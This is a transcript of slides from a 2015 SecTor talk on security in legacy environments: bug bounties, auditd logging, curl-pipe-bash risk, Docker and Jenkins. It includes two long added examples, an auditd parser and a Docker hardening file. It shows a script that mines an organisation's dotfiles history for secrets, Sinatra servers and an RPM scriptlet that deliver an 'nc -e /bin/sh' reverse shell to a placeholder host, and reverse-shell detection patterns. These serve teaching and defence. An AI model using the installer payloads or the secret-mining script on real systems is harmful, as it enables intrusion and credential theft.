
Security for non-Unicorns. SecTor 2015

Bea Hughes
October 20, 2015


Security is becoming quite the thing nowadays; everyone wants to have some. The mantra that things should be built with security in mind and can't be plastered on later is a very important one, whether you are established or based in Silicon Valley and about to write "the new hotness". However, what happens if your company is older than, say, 6 months? You will already have some legacy systems and code. I'll be talking about how it's possible to unearth some of the security issues you may face, how to stop them happening, what happens when you do uncover them, and coping strategies for dealing with them.


Transcript

  1. Who's this clown?
    » Infrastructure security at Etsy.
    » Recovered operations monkey at Puppet Labs.
    » Own a lot of black t-shirts.
    » Had 1300 accounts on his high school Linux system. (: [2]
    [2] https://twitter.com/skullmandible/status/411281851131523072
    @benjammingh for SecTor 2015
  2. Setlist
    » Intros. (you are here)
    » Few real world problems & applications.
    » Fixes, or at least coping mechanisms.
    » Panicked summary based on time.
    » Comments thinly masked as questions.
  3. From tiny seeds, do mighty acorns grow.
    » PinkiePwn's 6 tiny bugs in Chrome to full sandbox escape.
    » Egor Homakov's 5 small bugs in GitHub to full private access on GitHub.
    » XSS to remote code execution in under an hour.
    » Username & password from an HVAC system leads to the $160+ million Target breach.
  4. Computerising is hard.
    No. 1 takeaway for security types is a sense of perspective. (maybe even humility! gasp)
  5. Security people aren't great secure coders.
    » Snort: 10 CVEs, Wireshark: 322! CVEs
    » Security Firm Bit9 Hacked, Used to Spread Malware
    » Joxean Koret on Breaking Antivirus software
    » Tavis from Project Zero on exploiting ESET
    » BEST! FireEye just running Apache/PHP as root!
  6. So who do I trust?
    » No one? Always a great position for security people who don't want to get paid.
    » Everyone? Do I have some emails with funny cats for you to click on.
    » Security vendors? If you have infinite money and no attackers.
    » Attackers!
  7. "You're already being probed for security holes, do you want to know or not?"
  8. Bug bounties 103: The first few weeks will be hell.
  9. terrible bash example (don't do this)

    # Step 1 (commented out on the slide): for every public member of the target
    # GitHub org, clone their "dotfiles" repo into a directory named after them.
    # for i in $(curl --silent 'https://api.github.com/orgs/<target>/members' \
    #            | grep html_url | cut -f 4 -d '"' | cut -d / -f 4); \
    #   do ( curl --silent https://api.github.com/repos/$i/dotfiles | grep -q 'Not Found' || \
    #        git clone https://github.com/$i/dotfiles.git $i ) \
    # ; done

    # Step 2: grep every revision of every clone for the regex passed as $1,
    # because secrets that were "removed" are still in history.
    for i in * ; do
      [ -d "$i/.git" ] || continue
      cd $i
      for revision in $(git rev-list --all) ; do
        unset PAGER
        export GIT_PAGER=""
        # find . -iname \*.key -or -iname \*.pem
        out="$(git grep -i -E "$1" ${revision} )"
        if [ $? -eq 0 ] ; then
          echo "${out}" | LANG="C" sed "s/^/$i: /"
        fi
      done
      cd ..
    done
  10. Auditd
    Auditd is the best way to get command execution logged in your infrastructure.
  11. Auditd
    Auditd is the worst way to get this information to a log file.

    type=SYSCALL msg=audit(123:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=0 uid=1000....
    type=EXECVE msg=audit(123:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/sketchy.pl"
    type=CWD msg=audit(123:3020171): cwd="/home/superdave/hax"
    type=PATH msg=audit(123:3020171): item=0 name="/bin/sketchy.pl" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
    type=PATH msg=audit(123:3020171): item=1 name=(null) inode=200983 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
    type=PATH msg=audit(123:3020171): item=2 name=(null) inode=46 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
  12. WHY?
    "Why are the logs multiline?" -- David Shing, aka "Shingy", aka "The Shing", aka "AOL's digital prophet"
  13. Coping with multiline auditd
    » ELK: multiline filter in Logstash.
    » Other: github/gdestuynder/Audisp-json
    » Have cash, want a decent GUI (and more): Go use Threatstack!
    » Write something yourself in python & golang: I keep promising to OSS this ):
  14. Alert on sketchy things. (assumes ELK)
    1. Elastalert from Yelp
    2. Alert on "/bin/nc *-e /bin/sh*"
    3. You will now find when someone tries to run a reverse shell!
    4. Or when your ops people do fun things.
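An added example, not code from the talk: the multiline-joining and alerting the last few slides describe, in Python. It groups raw auditd records by their msg=audit(ts:serial) id, rebuilds the execve command line (decoding auditd's hex-encoded arguments and reassembling split long arguments), and runs the slide's "/bin/nc *-e /bin/sh*" glob over it. The log lines, timestamps, pids and the two extra reverse-shell patterns are constructed for the demo and are not from the deck.

```python
"""Join multi-line auditd execve events and alert on reverse-shell patterns."""
import re
from collections import defaultdict
from fnmatch import fnmatchcase

# Constructed sample in auditd's raw format, modelled on the log slide above.
# The timestamps, pids and the two nc events are made up for this demo.
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1445356800.101:3020171): arch=c000003e syscall=59 success=yes exit=0 items=3 ppid=9200 pid=9202 auid=1000 uid=1000 comm="perl" exe="/usr/bin/perl"
type=EXECVE msg=audit(1445356800.101:3020171): argc=3 a0="/usr/bin/perl" a1="-w" a2="/bin/sketchy.pl"
type=CWD msg=audit(1445356800.101:3020171): cwd="/home/superdave/hax"
type=PATH msg=audit(1445356800.101:3020171): item=0 name="/bin/sketchy.pl" inode=208346 dev=fe:02 mode=0100755 ouid=0 ogid=0 rdev=00:00
type=SYSCALL msg=audit(1445356800.102:3020172): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=9202 pid=9207 auid=1000 uid=1000 comm="nc" exe="/bin/nc"
type=EXECVE msg=audit(1445356800.102:3020172): argc=5 a0="/bin/nc" a1="-e" a2="/bin/sh" a3="root.legit.pw" a4="2222"
type=CWD msg=audit(1445356800.102:3020172): cwd="/home/superdave/hax"
type=SYSCALL msg=audit(1445356800.103:3020173): arch=c000003e syscall=59 success=yes exit=0 items=2 ppid=9202 pid=9210 auid=1000 uid=1000 comm="nc" exe="/bin/nc"
type=EXECVE msg=audit(1445356800.103:3020173): argc=5 a0="/bin/nc" a1="-e" a2=2F62696E2F7368202D69 a3="root.legit.pw" a4="2222"
type=EOE msg=audit(1445356800.103:3020173):
"""

RECORD_RE = re.compile(
    r'^type=(?P<type>\S+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\):\s*(?P<rest>.*)$')
FIELD_RE = re.compile(r'([\w\[\]]+)=("(?:[^"\\]|\\.)*"|\S*)')
STRING_FIELDS = {"cwd", "name", "comm", "exe", "proctitle"}

# First pattern is the one from the slide; the other two are this example's own.
RULES = {
    "nc reverse shell": "/bin/nc *-e /bin/sh*",
    "bash /dev/tcp reverse shell": "*bash*/dev/tcp/*",
    "python socket shell": "*python* -c *socket*dup2*",
}


def decode_value(key, raw):
    """Undo auditd's value encoding: quoted string, (null), or unquoted hex."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return raw[1:-1]
    if raw == "(null)":
        return None
    # auditd hex-encodes string fields containing spaces, quotes or control
    # characters and emits them unquoted; only decode fields known to hold
    # strings, or numeric fields such as pid=9202 would be mangled.
    is_argv = key[:1] == "a" and key[1:2].isdigit()
    if (is_argv or key in STRING_FIELDS) and len(raw) % 2 == 0 \
            and re.fullmatch(r"[0-9A-F]+", raw):
        return bytes.fromhex(raw).decode("utf-8", "replace")
    return raw


def parse_audit(text):
    """Group raw audit records by (timestamp, serial) into a list of events."""
    events = {}
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue  # not an audit record
        ev = events.setdefault((m["ts"], m["serial"]), {
            "ts": float(m["ts"]), "serial": int(m["serial"]),
            "records": defaultdict(list)})
        ev["records"][m["type"]].append(
            {k: decode_value(k, v) for k, v in FIELD_RE.findall(m["rest"])})
    return list(events.values())


def argv_of(execve_fields):
    """argv from an EXECVE record, rejoining a{i}[0], a{i}[1], ... pieces."""
    argv = []
    for i in range(int(execve_fields.get("argc", 0))):
        if f"a{i}" in execve_fields:
            argv.append(execve_fields[f"a{i}"])
        else:  # very long arguments are split into indexed chunks by auditd
            parts, j = [], 0
            while f"a{i}[{j}]" in execve_fields:
                parts.append(execve_fields[f"a{i}[{j}]"])
                j += 1
            argv.append("".join(parts))
    return argv


def command_line(event):
    """Reconstructed command line of an execve event, or None if not one."""
    ex = event["records"].get("EXECVE")
    if not ex:
        return None
    return " ".join("(null)" if a is None else a for a in argv_of(ex[0]))


def alerts_for(events, rules=RULES):
    """Match each event's command line against the glob rules; return hits."""
    hits = []
    for ev in events:
        cmd = command_line(ev)
        if cmd is None:
            continue
        sc = ev["records"].get("SYSCALL", [{}])[0]
        cwd = ev["records"].get("CWD", [{}])[0].get("cwd")
        for rule, pattern in rules.items():
            if fnmatchcase(cmd, pattern):
                hits.append({"rule": rule, "serial": ev["serial"], "ts": ev["ts"],
                             "auid": sc.get("auid"), "pid": sc.get("pid"),
                             "cwd": cwd, "cmd": cmd})
    return hits


if __name__ == "__main__":
    for hit in alerts_for(parse_audit(SAMPLE_LOG)):
        print(f"[{hit['rule']}] auid={hit['auid']} pid={hit['pid']} "
              f"cwd={hit['cwd']}: {hit['cmd']}")
```

The third constructed event is the case a naive "grep nc -e" misses: its a2 arrives hex-encoded because the argument contains a space, so the pattern only fires once the argument is decoded. In a real pipeline the grouping key also needs a timeout or the EOE record, since records for one serial can interleave with others.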
  15. Sinatra example

    require 'sinatra'

    # Serve the payload to curl (the "| bash" crowd) and the real installer
    # to anyone who looks at it in a browser first.
    get '/install.sh' do
      if request.env['HTTP_USER_AGENT'] =~ /curl/
        return 'nc -e /bin/sh root.legit.pw 2222 &'
      else
        return print_install_code()
      end
    end
  16. Sinatra example 2: Payback

    require 'sinatra'

    seen_before = []  # IPs that have already received the payload once

    # First fetch from an IP gets the payload, every later fetch gets the
    # clean installer, so "I downloaded it again to check" shows nothing.
    get '/install.sh' do
      ip = request.env['HTTP_CLIENT_IP']
      if seen_before.include? ip
        return print_install_code()
      else
        seen_before << ip
        return 'nc -e /bin/sh root.legit.pw 2222 &'
      end
    end
  17. curl | bash
    "But this is no worse than packages."

    foo$ sudo yum install sketchy
    foo$ sudo aptitude install sketchy
  18. curl | bash
    "but worse than downloading RPMs from a random site?"

    foo$ rpm --checksig sketchy.1.33-7.rpm
    foo$ dpkg-sig --verify sketchy.1.33-7.deb
  19. curl | bash

    root# rpm -qp --scripts sketchy-1.33-7.rpm
    preinstall scriptlet (using /bin/sh):
    bash -c 'while : ; \
      do \
        nc -e /bin/sh root.legit.pw 2222 ;\
      done'
  20. Verifiable
    This doesn't exist:
    foo$ curl legit.pw/sketch.sh | sudo sh --gpg-verify

    No one has ever done this:
    foo$ curl legit.pw/sketch.sh | gpg --verify --output - | sudo sh
  21. curl | bash
    "But I trust HTTPS"
    » HTTPS certs cost ~$6.
    » If I can't make $6 by owning a system, I should probably stop being an attacker.
    » @letsencrypt will soon make this free.
  22. >30% of Images in Docker Hub Contain High Priority Security Vulns
    - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner from BanyanOps
  23. But is Docker itself secure?
    » Don't run things as root.
    » No really, stop running things as root.
    » Did I mention not running things as root.
    » It is also not 1999. (Docker 1.8 addresses some of this, with its changes to who it runs as)
  24. Securify the Docker.
    » Don't use --privileged.
    » Use --cap-drop all and then --cap-add <thing> to get back to the minimum capabilities.
    » Use Docker Notary
    » Use grsecurity (just do that anyway, if you can.)
    » Use SELinux... I may as well ask for a pony here.
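An added example, not from the talk: the last two slides' advice written down as a docker-compose service definition. The image name, uid and port are placeholders; everything else is a real compose key.

```yaml
# Added example: one compose service hardened along the lines of the slides above.
services:
  web:
    image: registry.example.com/sketchy:1.33-7   # placeholder image name
    user: "10001:10001"          # not root; the uid is made up for the example
    privileged: false            # never --privileged
    cap_drop:
      - ALL                      # start from zero capabilities...
    cap_add:
      - NET_BIND_SERVICE         # ...and add back only what this service needs
    read_only: true              # root filesystem is immutable
    tmpfs:
      - /tmp                     # the one place it may write
    security_opt:
      - no-new-privileges:true   # no setuid escalation inside the container
    ports:
      - "8080:80"
```

The equivalent on the command line is `docker run --user 10001:10001 --cap-drop ALL --cap-add NET_BIND_SERVICE --read-only --security-opt no-new-privileges ...`. The Notary bullet is covered separately: with `DOCKER_CONTENT_TRUST=1` in the environment, the pull of that image is refused unless a signed tag is found. If the service needs a capability you had to look up to name, that is the moment to ask whether it should be doing that at all.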
  25. Threat modelling for beginners
    1. what are you actually defending against?
    2. from whom?
    3. for how much?
  26. <pinch of salt goes here>
    » I am not saying Docker is ZOMG unhackable.
    » it's just cgroups and namespacing. (just)
    » Escapes will happen.
    » They have a rad security team (Hi @diogomonica and @nathanmccauley)
  27. unpinchofsaltd
    » You can use it in a way that is secure, enough.
    » network separation & segregation still works.
    » secrets/credentials still a bigger problem.
    » PLEASE don't just adopt it because it's new & shiny.
    » unikernels ✨
  28. Its entire job is to take arbitrary code and run it, with access to some secret/credential.
  29. RCE as a service [6]
    [6] Hacking Jenkins Servers With No Password
  30. Make Jenkins suck fewer
    * Disable execution on the master Jenkins host.
    * Disable anonymous access.
    * (Use travis, if you can)
  31. NOT STOLEN FROM NickG's old 2012 deck. [7]
    [7] Thanks Nick. nickgsuperstar/devopssec-apply-devops-principles-to-security
  32. Jenkins as a force for [security] good
    » Gauntlt "be mean to your code"
    » https://github.com/secure-pipeline
    » Even Adobe blog on secure software, zomg!
  33. Summary
    » Computers are apparently hard.
    » Security is clearly harder still, obv.
    » Actually trust and humans is hard.
    » The typing is the easy bit. (ish)
  34. More Summary
    » Complex systems lead to much more complex security problems. (see OAuth)
    » Annual pen-tests don't scale, bug bounties can help.
    » Attackers are mining any public info you have (GitHub, S3, pastebin?)
    » No really, go check all your S3 buckets...
  35. Will there be a summary of summaries?
    » I beg you to stop trusting curl.
    » Auditd is awful, but it can be fewer awful.
    » Jenkins, you probably have to have one.
    » but that can be okay, nay, even useful for security.
  36. A summary appeared, what happened next will shock you
    » Docker and security can be used in the same sentence.
    » Understand your threat model (Apple's guide)
    » Don't be a FireEye, stop running things as root.
  37. Thank you
    » Twidder: @benjammingh
    » LinkedIn: lnkdin.me/p/benyeah
    » FidoNet: 2:254/524.13
    » JitHub: github.com/barn
    » SpeakerDeck: speakerdeck.com/barnbarn
    » Etsy: Careers <--- CodeAsCraft <--- our blog